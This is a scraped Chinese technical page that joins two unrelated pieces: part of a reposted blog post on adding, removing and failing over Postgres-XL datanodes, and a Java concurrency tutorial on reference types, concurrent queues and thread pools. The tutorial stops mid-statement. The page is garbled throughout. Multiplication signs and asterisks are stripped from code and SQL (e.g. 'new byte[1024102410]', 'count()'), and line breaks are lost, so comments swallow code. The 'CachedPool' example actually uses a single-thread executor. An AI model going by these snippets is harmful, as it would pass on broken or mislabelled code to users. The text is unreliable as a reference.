,指定好数据目录位置,从两个节点升级到3个节点,之后要写3个none none应该是datanodeSpecificExtraConfig或者datanodeSpecificExtraPgHba配置PGXC add datanode master datanode3 xl3 15432 6671 /home/postgres/pgxc/nodes/datanode/datanode3 none none none 等待新增完成后,查询集群节点状态: postgres= select from pgxc_node;node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-----------+-----------+-----------+-----------+----------------+------------------+-------------datanode1 | D | 15432 | xl1 | t | f | 888802358datanode2 | D | 15432 | xl2 | f | f | -905831925datanode3 | D | 15432 | xl3 | f | f | -705831925coord1 | C | 5432 | xl1 | f | f | 1885696643coord2 | C | 5432 | xl2 | f | f | -1197102633(4 rows) 节点新增完毕 数据重新分布 由于新增节点后无法自动完成数据重新分布,需要手动操作。 DISTRIBUTE表分布在了node1,node2节点上,如下: postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+-------1148549230 | 42-927910690 | 58(2 rows) 新增一个节点后,将sharding表数据重新分配到三个节点上,将repl表复制到新节点 重分布sharding表postgres= ALTER TABLE disttab ADD NODE (datanode3);ALTER TABLE 复制数据到新节点postgres= ALTER TABLE repltab ADD NODE (datanode3);ALTER TABLE 查看新的数据分布: postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;xc_node_id | count ------------+--------700122826 | 36-927910690 | 321148549230 | 32(3 rows) 登录datanode3(新增的时候,放在了xl3服务器上,端口15432)节点查看数据: [postgres@gtm ~]$ psql -h xl3 -p 15432 -U postgrespsql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= select count() from repltab;count -------100(1 row) 很明显,通过 ALTER TABLE tt ADD NODE (dn)命令,可以将DISTRIBUTE表数据重新分布到新节点,重分布过程中会中断所有事务。可以将REPLICATION表数据复制到新节点。 从datanode节点中回收数据 postgres= ALTER TABLE disttab DELETE NODE (datanode3);ALTER TABLEpostgres= ALTER TABLE repltab DELETE NODE (datanode3);ALTER TABLE 删除数据节点 Postgresql-XL并没有检查将被删除的datanode节点是否有replicated/distributed表的数据,为了数据安全,在删除之前需要检查下被删除节点上的数据,有数据的话,要回收掉分配到其他节点,然后才能安全删除。删除数据节点分为四步骤: 1.查询要删除节点dn3的oid postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id -------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11819 | coord1 | C | 5432 | datanode1 | f | f | 188569664316384 | coord2 | C | 5432 | datanode2 | f | f | -119710263316385 | node1 | D | 5433 | datanode1 | f | t | 114854923016386 | node2 | D | 5433 | datanode2 | f | f | -92791069016397 | dn3 | D | 5430 | datanode1 | f | f | -700122826(5 rows) 2.查询dn3对应的oid中是否有数据 testdb= SELECT FROM pgxc_class WHERE nodeoids::integer[] @> ARRAY[16397];pcrelid | pclocatortype | pcattnum | pchashalgorithm | pchashbuckets | nodeoids ---------+---------------+----------+-----------------+---------------+-------------------16388 | H | 1 | 1 | 4096 | 16397 16385 1638616394 | R | 0 | 0 | 0 | 16397 16385 16386(2 rows) 3.有数据的先回收数据 postgres= ALTER TABLE disttab DELETE NODE (dn3);ALTER TABLEpostgres= ALTER TABLE repltab DELETE NODE (dn3);ALTER TABLEpostgres= SELECT FROM pgxc_class WHERE nodeoids::integer[] @> ARRAY[16397];pcrelid | pclocatortype | pcattnum | pchashalgorithm | pchashbuckets | nodeoids ---------+---------------+----------+-----------------+---------------+----------(0 rows) 4.安全删除dn3 PGXC$ remove datanode master dn3 clean 故障节点FAILOVER 1.查看当前集群状态 [postgres@gtm ~]$ psql -h xl1 -p 5432psql (PGXL 10r1.1, based on PG 10.6 (Postgres-XL 10r1.1))Type "help" for help.postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id-------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11739 | coord1 | C | 5432 | xl1 | f | f | 188569664316384 | coord2 | C | 5432 | xl2 | f | f | -119710263316387 | datanode2 | D | 15432 | xl2 | f | f | -90583192516388 | datanode1 | D | 15432 | xl1 | t | t | 888802358(4 rows) 2.模拟datanode1节点故障 直接关闭即可 PGXC stop -m immediate datanode master datanode1Stopping datanode master datanode1.Done. 3.测试查询 只要查询涉及到datanode1上的数据,那么该查询就会报错 postgres= SELECT xc_node_id, count() FROM disttab GROUP BY xc_node_id;WARNING: failed to receive file descriptors for connectionsERROR: Failed to get pooled connectionsHINT: This may happen because one or more nodes are currently unreachable, either because of node or network failure.Its also possible that the target node may have hit the connection limit or the pooler is configured with low connections.Please check if all nodes are running fine and also review max_connections and max_pool_size configuration parameterspostgres= SELECT xc_node_id, FROM disttab WHERE col1 = 3;xc_node_id | col1 | col2 | col3------------+------+------+-------905831925 | 3 | 103 | foo(1 row) 测试发现,查询范围如果涉及到故障的node1节点,会报错,而查询的数据范围不在node1上的话,仍然可以查询。 4.手动切换 要想切换,必须要提前配置slave节点。 PGXC$ failover datanode node1 切换完成后,查询集群 postgres= SELECT oid, FROM pgxc_node;oid | node_name | node_type | node_port | node_host | nodeis_primary | nodeis_preferred | node_id -------+-----------+-----------+-----------+-----------+----------------+------------------+-------------11819 | coord1 | C | 5432 | datanode1 | f | f | 188569664316384 | coord2 | C | 5432 | datanode2 | f | f | -119710263316386 | node2 | D | 15432 | datanode2 | f | f | -92791069016385 | node1 | D | 15433 | datanode2 | f | t | 1148549230(4 rows) 发现datanode1节点的ip和端口都已经替换为配置的slave了。 本篇文章为转载内容。原文链接:https://blog.csdn.net/qianglei6077/article/details/94379331。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-01-30 11:09:03
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...引用 软引用是用来描述一些还有用但并非必须的对象。 对于软引用关联着的对象,在系统将要发生内存溢出异常之前,将会把这些对象列进回收范围进行第二次回收。 如果这次回收还没有足够的内存,才会抛出内存溢出异常。 -Xmx20M/import java.lang.ref.SoftReference;public class T02_SoftReference {public static void main(String[] args) {SoftReference<byte[]> m = new SoftReference<>(new byte[1024102410]);//创建软引用,分配10M//m = null;System.out.println(m.get());//获取System.gc();//垃圾回收try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(m.get());//再分配一个数组,heap将装不下,这时候系统会垃圾回收,先回收一次,如果不够,会把软引用干掉byte[] b = new byte[1024102415];System.out.println(m.get());} }//软引用非常适合缓存使用 2、弱引用 public class M {@Overrideprotected void finalize() throws Throwable {System.out.println("finalize");} } 上图中,tl对象强引用指向ThreadLocal,map中key弱引用指向ThreadLocal,当tl=null时,强引用消失,此时弱引用也将自动被回收,但是此时key=null,value指向10M这个就永远访问不到,既内存泄露 下图中,18行到20行为解决内存泄露问题的,那就是通过remove()将它消除了 / 弱引用遭到gc就会回收/import java.lang.ref.WeakReference;public class T03_WeakReference {public static void main(String[] args) {WeakReference<M> m = new WeakReference<>(new M());System.out.println(m.get());System.gc();System.out.println(m.get());ThreadLocal<M> tl = new ThreadLocal<>();tl.set(new M());tl.remove();} } 3、虚引用 虚引用 虚引用不是给开发人员用的,一般是给写JVM(java虚拟机,没有它java程序运行不了),Netty等技术大牛用的 虚引用,对象当被回收时,会将其放在队列中,此时我们监听到队列中有新值了,就知道有虚引用被回收了 此时我们要做相应的处理,虚引用指向的值,是无法直接get()获取的 虚引用使用场景 一般情况(其它情况暂时没什么用),虚引用指向堆外内存(直接被操作系统管理的内存),JVM无法对其回收 当虚引用对象被回收时,JVM的垃圾回收无法自动回收堆外内存, 但是此时,虚引用对象被回收,会将其放在队列中 操作人员,看到队列中有对象被回收,就进行相应操作,回收堆内存 如何回收堆外内存 C和C++有函数可以用 java现在也提供了Unsafe类可以操作堆外内存,具体请参考上一篇博客,总之,JDK1.8只能通过反射来用,JDK1.9以上可以通过new Unsafe对象来用 Unsafe类的方法有: copyMemory():直接访问内存 allocateMemory():直接分配内存,这就必须手动回收内存了 freeMemory():回收内存 下面是一个虚引用例子,自己看吧,懂得自然懂,现在看不懂的,先收藏或者保存上,以后回来看 / 一个对象是否有虚引用的存在,完全不会对其生存时间构成影响, 也无法通过虚引用来获取一个对象的实例。 为一个对象设置虚引用关联的唯一目的就是能在这个对象被收集器回收时收到一个系统通知。 虚引用和弱引用对关联对象的回收都不会产生影响,如果只有虚引用活着弱引用关联着对象, 那么这个对象就会被回收。它们的不同之处在于弱引用的get方法,虚引用的get方法始终返回null, 弱引用可以使用ReferenceQueue,虚引用必须配合ReferenceQueue使用。 jdk中直接内存的回收就用到虚引用,由于jvm自动内存管理的范围是堆内存, 而直接内存是在堆内存之外(其实是内存映射文件,自行去理解虚拟内存空间的相关概念), 所以直接内存的分配和回收都是有Unsafe类去操作,java在申请一块直接内存之后, 会在堆内存分配一个对象保存这个堆外内存的引用, 这个对象被垃圾收集器管理,一旦这个对象被回收, 相应的用户线程会收到通知并对直接内存进行清理工作。 事实上,虚引用有一个很重要的用途就是用来做堆外内存的释放, DirectByteBuffer就是通过虚引用来实现堆外内存的释放的。/import java.lang.ref.PhantomReference;import java.lang.ref.Reference;import java.lang.ref.ReferenceQueue;import java.util.LinkedList;import java.util.List;public class T04_PhantomReference {private static final List<Object> LIST = new LinkedList<>();private static final ReferenceQueue<M> QUEUE = new ReferenceQueue<>();public static void main(String[] args) {PhantomReference<M> phantomReference = new PhantomReference<>(new M(), QUEUE);new Thread(() -> {while (true) {LIST.add(new byte[1024 1024]);try {Thread.sleep(1000);} catch (InterruptedException e) {e.printStackTrace();Thread.currentThread().interrupt();}System.out.println(phantomReference.get());} }).start();new Thread(() -> {while (true) {Reference<? extends M> poll = QUEUE.poll();if (poll != null) {System.out.println("--- 虚引用对象被jvm回收了 ---- " + poll);} }}).start();try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();} }} 2、容器 1、发展历史(一定要了解) map容器你需要了解的历史 JDK早期,java提供了Vector和Hashtable两个容器,这两个容器,很多操作都加了锁Synchronized,对于某些不需要用锁的情况下,就显得十分影响性能,所以现在基本没人用这两个容器,但是面试经常问这两个容器里面的数据结构等内容 后来,出现了HashMap,此容器完全不加锁,是用的最多的容器 但是完全不加锁未免不完善,所以java提供了如下方式,将HashMap变为加锁的 //通过Collections.synchronizedMap(HashMap)方法,将其变为加锁Map集合,其中泛型随意,UUID只是举例。static Map<UUID, UUID> m = Collections.synchronizedMap(new HashMap<UUID, UUID>()); 通过阅读源码发现,上面方法将HashMap变为加锁,也是使用Synchronized,只是锁的内容更细,但并不比HashTable效率高多少 所以衍生除了新的容器ConcurrentHashMap ConcurrentHashMap 此容器,插入效率不如上面的,因为它做了各种判断和CAS,但是差距不是特别大 读取效率很高,100个线程同时访问,每个线程读取一百万次实测 Hashtable 39s ,SynchronizedHashMap 38s ,ConcurrentHashMap 1.7s 前两个将近40秒,ConcurrentHashMap只需要不到2s,由此可见此容器读取效率极高 2、为什么推荐使用Queue来做高并发 为什么推荐Queue(队列) Queue接口提供了很多针对多线程非常友好的API(offer ,peek和poll,其中BlockingQueue还添加了put和take可以阻塞),可以说专门为多线程高并发而创造的接口,所以一般我们使用Queue而不用List 以下代码分别使用链表LinkList和ConcurrentQueue,对比一下速度 LinkList用了5s多,ConcurrentQueue几乎瞬间完成 Concurrent接口就是专为多线程设计,多线程设计要多考虑Queue(高并发用)的使用,少使用List / 有N张火车票,每张票都有一个编号 同时有10个窗口对外售票 请写一个模拟程序 分析下面的程序可能会产生哪些问题? 重复销售?超量销售? 使用Vector或者Collections.synchronizedXXX 分析一下,这样能解决问题吗? 就算操作A和B都是同步的,但A和B组成的复合操作也未必是同步的,仍然需要自己进行同步 就像这个程序,判断size和进行remove必须是一整个的原子操作 @author 马士兵/import java.util.LinkedList;import java.util.List;import java.util.concurrent.TimeUnit;public class TicketSeller3 {static List<String> tickets = new LinkedList<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {synchronized(tickets) {if(tickets.size() <= 0) break;try {TimeUnit.MILLISECONDS.sleep(10);} catch (InterruptedException e) {e.printStackTrace();}System.out.println("销售了--" + tickets.remove(0));} }}).start();} }} 队列 import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class TicketSeller4 {static Queue<String> tickets = new ConcurrentLinkedQueue<>();static {for(int i=0; i<1000; i++) tickets.add("票 编号:" + i);}public static void main(String[] args) {for(int i=0; i<10; i++) {new Thread(()->{while(true) {String s = tickets.poll();if(s == null) break;else System.out.println("销售了--" + s);} }).start();} }} 3、多线程常用容器 1、ConcurrentHashMap(无序)和ConcurrentSkipListMap(有序,链表,使用跳表数据结构,让查询更快) 跳表:http://blog.csdn.net/sunxianghuang/article/details/52221913 import java.util.;import java.util.concurrent.ConcurrentHashMap;import java.util.concurrent.ConcurrentSkipListMap;import java.util.concurrent.CountDownLatch;public class T01_ConcurrentMap {public static void main(String[] args) {Map<String, String> map = new ConcurrentHashMap<>();//Map<String, String> map = new ConcurrentSkipListMap<>(); //高并发并且排序//Map<String, String> map = new Hashtable<>();//Map<String, String> map = new HashMap<>(); //Collections.synchronizedXXX//TreeMapRandom r = new Random();Thread[] ths = new Thread[100];CountDownLatch latch = new CountDownLatch(ths.length);long start = System.currentTimeMillis();for(int i=0; i<ths.length; i++) {ths[i] = new Thread(()->{for(int j=0; j<10000; j++) map.put("a" + r.nextInt(100000), "a" + r.nextInt(100000));latch.countDown();});}Arrays.asList(ths).forEach(t->t.start());try {latch.await();} catch (InterruptedException e) {e.printStackTrace();}long end = System.currentTimeMillis();System.out.println(end - start);System.out.println(map.size());} } 2、CopyOnWriteList(写时复制)和CopyOnWriteSet 适用于,高并发是,读的多,写的少的情况 当我们写的时候,将容器复制,让写线程去复制的线程写(写的时候加锁) 而读线程依旧去读旧的(读的时候不加锁) 当写完,将对象指向复制后的已经写完的容器,原来容器销毁 大大提高读的效率 / 写时复制容器 copy on write 多线程环境下,写时效率低,读时效率高 适合写少读多的环境 @author 马士兵/import java.util.ArrayList;import java.util.Arrays;import java.util.List;import java.util.Random;import java.util.Vector;import java.util.concurrent.CopyOnWriteArrayList;public class T02_CopyOnWriteList {public static void main(String[] args) {List<String> lists = //new ArrayList<>(); //这个会出并发问题!//new Vector();new CopyOnWriteArrayList<>();Random r = new Random();Thread[] ths = new Thread[100];for(int i=0; i<ths.length; i++) {Runnable task = new Runnable() {@Overridepublic void run() {for(int i=0; i<1000; i++) lists.add("a" + r.nextInt(10000));} };ths[i] = new Thread(task);}runAndComputeTime(ths);System.out.println(lists.size());}static void runAndComputeTime(Thread[] ths) {long s1 = System.currentTimeMillis();Arrays.asList(ths).forEach(t->t.start());Arrays.asList(ths).forEach(t->{try {t.join();} catch (InterruptedException e) {e.printStackTrace();} });long s2 = System.currentTimeMillis();System.out.println(s2 - s1);} } 3、synchronizedList和ConcurrentLinkedQueue package com.mashibing.juc.c_025;import java.util.ArrayList;import java.util.Collections;import java.util.List;import java.util.Queue;import java.util.concurrent.ConcurrentLinkedQueue;public class T04_ConcurrentQueue {public static void main(String[] args) {List<String> strsList = new ArrayList<>();List<String> strsSync = Collections.synchronizedList(strsList);//加锁ListQueue<String> strs = new ConcurrentLinkedQueue<>();//Concurrent链表队列,就是读快for(int i=0; i<10; i++) {strs.offer("a" + i); //add添加,但是不同点是,此方法会返回一个布尔值}System.out.println(strs);System.out.println(strs.size());System.out.println(strs.poll());//取出,取完后将元素去除System.out.println(strs.size());System.out.println(strs.peek());//取出,但是不会将元素从队列删除System.out.println(strs.size());//双端队列Deque} } 4、LinkedBlockingQueue 链表阻塞队列(无界链表,可以一直装东西,直到内存满(其实,也不是无限,其长度Integer.MaxValue就是上限,毕竟最大就这么大)) 主要体现在put和take方法,put添加的时候,如果队列满了,就阻塞当前线程,直到队列有空位,继续插入。take方法取的时候,如果没有值,就阻塞,等有值了,立马去取 import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.LinkedBlockingQueue;import java.util.concurrent.TimeUnit;public class T05_LinkedBlockingQueue {static BlockingQueue<String> strs = new LinkedBlockingQueue<>();static Random r = new Random();public static void main(String[] args) {new Thread(() -> {for (int i = 0; i < 100; i++) {try {strs.put("a" + i); //如果满了,当前线程就会等待(实现阻塞),等多会有空位,将值插入TimeUnit.MILLISECONDS.sleep(r.nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();} }}, "p1").start();for (int i = 0; i < 5; i++) {new Thread(() -> {for (;;) {try {System.out.println(Thread.currentThread().getName() + " take -" + strs.take()); //取内容,如果空了,当前线程就会等待(实现阻塞)} catch (InterruptedException e) {e.printStackTrace();} }}, "c" + i).start();} }} 5、ArrayBlockingQueue 有界阻塞队列(因为Array需要指定长度) import java.util.Random;import java.util.concurrent.ArrayBlockingQueue;import java.util.concurrent.BlockingQueue;import java.util.concurrent.TimeUnit;public class T06_ArrayBlockingQueue {static BlockingQueue<String> strs = new ArrayBlockingQueue<>(10);static Random r = new Random();public static void main(String[] args) throws InterruptedException {for (int i = 0; i < 10; i++) {strs.put("a" + i);}//strs.put("aaa"); //满了就会等待,程序阻塞//strs.add("aaa");//strs.offer("aaa");strs.offer("aaa", 1, TimeUnit.SECONDS);System.out.println(strs);} } 6、特殊的阻塞队列1:DelayQueue 延时队列(按时间进行调度,就是隔多长时间运行,谁隔的少,谁先) 以下例子中,我们添加线程到队列顺序为t12345,正常情况下,会按照顺序运行,但是这里有了延时时间,也就是时间越短,越先执行 步骤很简单,拿到延时队列 指定构造方法 继承 implements Delayed 重写 compareTo和getDelay import java.util.Calendar;import java.util.Random;import java.util.concurrent.BlockingQueue;import java.util.concurrent.DelayQueue;import java.util.concurrent.Delayed;import java.util.concurrent.TimeUnit;public class T07_DelayQueue {static BlockingQueue<MyTask> tasks = new DelayQueue<>();static Random r = new Random();static class MyTask implements Delayed {String name;long runningTime;MyTask(String name, long rt) {this.name = name;this.runningTime = rt;}@Overridepublic int compareTo(Delayed o) {if(this.getDelay(TimeUnit.MILLISECONDS) < o.getDelay(TimeUnit.MILLISECONDS))return -1;else if(this.getDelay(TimeUnit.MILLISECONDS) > o.getDelay(TimeUnit.MILLISECONDS)) return 1;else return 0;}@Overridepublic long getDelay(TimeUnit unit) {return unit.convert(runningTime - System.currentTimeMillis(), TimeUnit.MILLISECONDS);}@Overridepublic String toString() {return name + " " + runningTime;} }public static void main(String[] args) throws InterruptedException {long now = System.currentTimeMillis();MyTask t1 = new MyTask("t1", now + 1000);MyTask t2 = new MyTask("t2", now + 2000);MyTask t3 = new MyTask("t3", now + 1500);MyTask t4 = new MyTask("t4", now + 2500);MyTask t5 = new MyTask("t5", now + 500);tasks.put(t1);tasks.put(t2);tasks.put(t3);tasks.put(t4);tasks.put(t5);System.out.println(tasks);for(int i=0; i<5; i++) {System.out.println(tasks.take());//获取的是toString方法返回值} }} 7、特殊的阻塞队列2:PriorityQueque 优先队列(二叉树算法,就是排序) import java.util.PriorityQueue;public class T07_01_PriorityQueque {public static void main(String[] args) {PriorityQueue<String> q = new PriorityQueue<>();q.add("c");q.add("e");q.add("a");q.add("d");q.add("z");for (int i = 0; i < 5; i++) {System.out.println(q.poll());} }} 8、特殊的阻塞队列3:SynchronusQueue 同步队列(线程池用处非常大) 此队列容量为0,当插入元素时,必须同时有个线程往外取 就是说,当你往这个队列里面插入一个元素,它就拿着这个元素站着(阻塞),直到有个取元素的线程来,它就把元素交给它 就是用来同步数据的,也就是线程间交互数据用的一个特殊队列 package com.mashibing.juc.c_025;import java.util.concurrent.BlockingQueue;import java.util.concurrent.SynchronousQueue;public class T08_SynchronusQueue { //容量为0public static void main(String[] args) throws InterruptedException {BlockingQueue<String> strs = new SynchronousQueue<>();new Thread(()->{//这个线程就是消费者,来取值try {System.out.println(strs.take());//和同步队列要值} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.put("aaa"); //阻塞等待消费者消费,就拿着aaa站着,等线程来取//strs.put("bbb");//strs.add("aaa");System.out.println(strs.size());} } 9、特殊的阻塞队列4:TransferQueue 传递队列 此队列加入了一个方法transfer()用来向队列添加元素 但是和put()方法不同的是,put添加完元素就走了 而这个方法,添加完自己就阻塞了,直到有人将这个元素取走,它才继续工作(省去我们手动阻塞) import java.util.concurrent.LinkedTransferQueue;public class T09_TransferQueue {public static void main(String[] args) throws InterruptedException {LinkedTransferQueue<String> strs = new LinkedTransferQueue<>();new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();strs.transfer("aaa");//放东西到队列,同时阻塞等待消费者线程,取走元素//strs.put("aaa");//如果用put就和普通队列一样,放完东西就走了/new Thread(() -> {try {System.out.println(strs.take());} catch (InterruptedException e) {e.printStackTrace();} }).start();/} } 3、线程池 线程池 由于单独创建线程,十分影响效率,而且无法对线程集中管理,一旦疏落,可能线程无限执行,浪费资源 线程池就是一个存储线程的游泳池,而每个线程就是池子里面的赛道 池子里的线程不执行任何任务,只是提供一个资源 而谁提交了任务,比如我想来游泳,那么池子就给你一个赛道,让你游泳 比如它想练憋气,那么给它一个赛道练憋气 当他们用完,走了,那么后面其它人再过来继续用 这就是线程池,始终只有这几个线程,不做实现,而是借用这几个线程的用户,自己掌控用这些线程资源做什么(提交任务给线程,线程空闲就帮他们完成任务) 线程池的两种类型(两类,不是两个) ThreadPoolExecutor(简称TPE) ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 1、常用类 Executor ExecutorService 扩展了execute方法,具有一个返回值 规定了异步执行机制,提供了一些执行器方法,比如shutdown()关闭等 但是它不知道执行器中的线程何时执行完 Callable 对Runnable进行了扩展,实现Callable的调用,可以有返回值,表示线程的状态 但是无法返回线程执行结果 Future 获得未来线程执行结果 由此,我们可以得知线程池基本的一个使用步骤 其中service.submit():为异步提交,也就是说,主线程该干嘛干嘛,我是异步执行的,和同步不一样(当前线程执行完,主线程才能继续执行,叫同步) futuer.get():获取结果集结果,此时因为异步,主线程执行到这里,结果集可能还没封装好,所以此时如果没有值,就阻塞,直到结果集出来 public static void main(String[] args) throws ExecutionException, InterruptedException {Callable<String> c = new Callable() {@Overridepublic String call() throws Exception {return "Hello Callable";} };ExecutorService service = Executors.newCachedThreadPool();Future<String> future = service.submit(c); //异步System.out.println(future.get());//阻塞service.shutdown();} 2、FutureTask 可充当任务的结果集 上面我们介绍Future是用来得到任务的执行结果的 而FutureTask,可以当做一个任务用,并且返回任务的结果,也就是可以跑线程,然后还可以得到线程结果 public static void main(String[] args) throws InterruptedException, ExecutionException {FutureTask<Integer> task = new FutureTask<>(()->{TimeUnit.MILLISECONDS.sleep(500);return 1000;}); //new Callable () { Integer call();}new Thread(task).start();System.out.println(task.get()); //阻塞} 3、CompletableFuture 非常灵活的任务结果集 一个非常灵活的结果集 他可以将很多执行不同任务的线程的结果进行汇总 比如一个网站,它可以启动多个线程去各大电商网站,比如淘宝,京东,收集某些或某一个商品的价格 最后,将获取的数据进行整合封装 最终,客户就可以通过此网站,获取某类商品在各网站的价格信息 / 假设你能够提供一个服务 这个服务查询各大电商网站同一类产品的价格并汇总展示 @author 马士兵 http://mashibing.com/import java.io.IOException;import java.util.Random;import java.util.concurrent.CompletableFuture;import java.util.concurrent.ExecutionException;import java.util.concurrent.TimeUnit;public class T06_01_CompletableFuture {public static void main(String[] args) throws ExecutionException, InterruptedException {long start, end;/start = System.currentTimeMillis();priceOfTM();priceOfTB();priceOfJD();end = System.currentTimeMillis();System.out.println("use serial method call! " + (end - start));/start = System.currentTimeMillis();CompletableFuture<Double> futureTM = CompletableFuture.supplyAsync(()->priceOfTM());CompletableFuture<Double> futureTB = CompletableFuture.supplyAsync(()->priceOfTB());CompletableFuture<Double> futureJD = CompletableFuture.supplyAsync(()->priceOfJD());CompletableFuture.allOf(futureTM, futureTB, futureJD).join();//当所有结果集都获取到,才汇总阻塞CompletableFuture.supplyAsync(()->priceOfTM()).thenApply(String::valueOf).thenApply(str-> "price " + str).thenAccept(System.out::println);end = System.currentTimeMillis();System.out.println("use completable future! " + (end - start));try {System.in.read();} catch (IOException e) {e.printStackTrace();} }private static double priceOfTM() {delay();return 1.00;}private static double priceOfTB() {delay();return 2.00;}private static double priceOfJD() {delay();return 3.00;}/private static double priceOfAmazon() {delay();throw new RuntimeException("product not exist!");}/private static void delay() {int time = new Random().nextInt(500);try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.printf("After %s sleep!\n", time);} } 4、TPE型线程池1:ThreadPoolExecutor 原理及其参数 线程池由两个集合组成,一个集合存储线程,一个集合存储任务 存储线程:可以规定大小,最多可以有多少个,以及指定核心线程数量(不会被回收) 任务队列:存储任务 细节:初始线程池没有线程,当有一个任务来,线程池起一个线程,又有一个任务来,再起一个线程,直到达到核心线程数量 核心线程数量达到时,新来的任务将存储到任务队列中等待核心线程处理完成,直到任务队列也满了 当任务队列满了,此时再次启动一个线程(非核心线程,一旦空闲,达到指定时间将会消失),直到达到线程最大数量 当线程容器和任务容器都满了,又来了线程,将会执行拒绝策略 上面的细节涉及的所有步骤内容,均由创建线程池的参数执行 下面是ThreadPoolExecutor构造方法参数的源码注释 / 用给定的初始值,创建一个新的线程池 @param corePoolSize 核心线程数量 @param maximumPoolSize 最大线程数量 @param keepAliveTime 当线程数大于核心线程数量时,空闲的线程可生存的时间 @param unit 时间单位 @param workQueue 任务队列,只能包含由execute提交的Runnable任务 @param threadFactory 工厂,用于创建线程给线程池调度的工厂,可以自定义 @param handler 拒绝策略(可以自定义,JDK默认提供4种),当线程边界和队列容量已经满了,新来线程被阻塞时使用的处理程序/public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) JDK提供的4种拒绝策略,不常用,一般都是自己定义拒绝策略 Abort:抛异常 Discard:扔掉,不抛异常 DiscardOldest:扔掉排队时间最久的(将队列中排队时间最久的扔掉,然后让新来的进来) CallerRuns:调用者处理任务(谁通过execute方法提交任务,谁处理) ThreadPoolExecutor继承关系 继承关系:ThreadPoolExecutor->AbstractExectorService类->ExectorService接口->Exector接口 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面创建线程池,哪里用到了它 使用实例 import java.io.IOException;import java.util.concurrent.;public class T05_00_HelloThreadPool {static class Task implements Runnable {private int i;public Task(int i) {this.i = i;}@Overridepublic void run() {System.out.println(Thread.currentThread().getName() + " Task " + i);try {System.in.read();} catch (IOException e) {e.printStackTrace();} }@Overridepublic String toString() {return "Task{" +"i=" + i +'}';} }public static void main(String[] args) {ThreadPoolExecutor tpe = new ThreadPoolExecutor(2, 4,60, TimeUnit.SECONDS,new ArrayBlockingQueue<Runnable>(4),Executors.defaultThreadFactory(),new ThreadPoolExecutor.CallerRunsPolicy());//创建线程池,核心2个,最大4个,空闲线程存活时间60s,任务队列容量4,使用默认线程工程,创建线程。拒绝策略是JDK提供的for (int i = 0; i < 8; i++) {tpe.execute(new Task(i));//供提交8次任务}System.out.println(tpe.getQueue());//查看任务队列tpe.execute(new Task(100));//提交新的任务System.out.println(tpe.getQueue());tpe.shutdown();//关闭线程池} } 5、TPE型线程池2:SingleThreadPool 单例线程池(只有一个线程) 为什么有单例线程池 有任务队列,有线程池管理机制 Executors(注意这后面有s) 它可以说是线程池工厂类,我们一般通过它创建线程池,并且它为我们封装了线程 看看下面哪里用到了它 /创建单例线程池,扔5个任务进去,查看输出结果,看看有几个线程执行任务/import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();for(int i=0; i<5; i++) {final int j = i;service.execute(()->{System.out.println(j + " " + Thread.currentThread().getName());});} }} 6、TPE型线程池3:CachedPool 缓存,存储线程池 此线程池没有核心线程,来一个任务启动一个线程(最多Integer.MaxValue,不会放在任务队列,因为任务队列容量为0),每个线程空闲后,只能活60s 实例 import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;public class T07_SingleThreadPool {public static void main(String[] args) {ExecutorService service = Executors.newSingleThreadExecutor();//通过Executors获取池子for(int i=0; i<5; i++) {final int j = i;service.execute(()->{//提交任务System.out.println(j + " " + Thread.currentThread().getName());});}service.shutdown();} } 7、TPE型线程池4:FixedThreadPool 固定线程池 此线次池,用于创建一个固定线程数量的线程池,不会回收 实例 import java.util.ArrayList;import java.util.List;import java.util.concurrent.Callable;import java.util.concurrent.ExecutionException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.Future;public class T09_FixedThreadPool {public static void main(String[] args) throws InterruptedException, ExecutionException {//并发执行long start = System.currentTimeMillis();getPrime(1, 200000); long end = System.currentTimeMillis();System.out.println(end - start);//输出并发执行耗费时间final int cpuCoreNum = 4;//并行执行ExecutorService service = Executors.newFixedThreadPool(cpuCoreNum);MyTask t1 = new MyTask(1, 80000); //1-5 5-10 10-15 15-20MyTask t2 = new MyTask(80001, 130000);MyTask t3 = new MyTask(130001, 170000);MyTask t4 = new MyTask(170001, 200000);Future<List<Integer>> f1 = service.submit(t1);Future<List<Integer>> f2 = service.submit(t2);Future<List<Integer>> f3 = service.submit(t3);Future<List<Integer>> f4 = service.submit(t4);start = 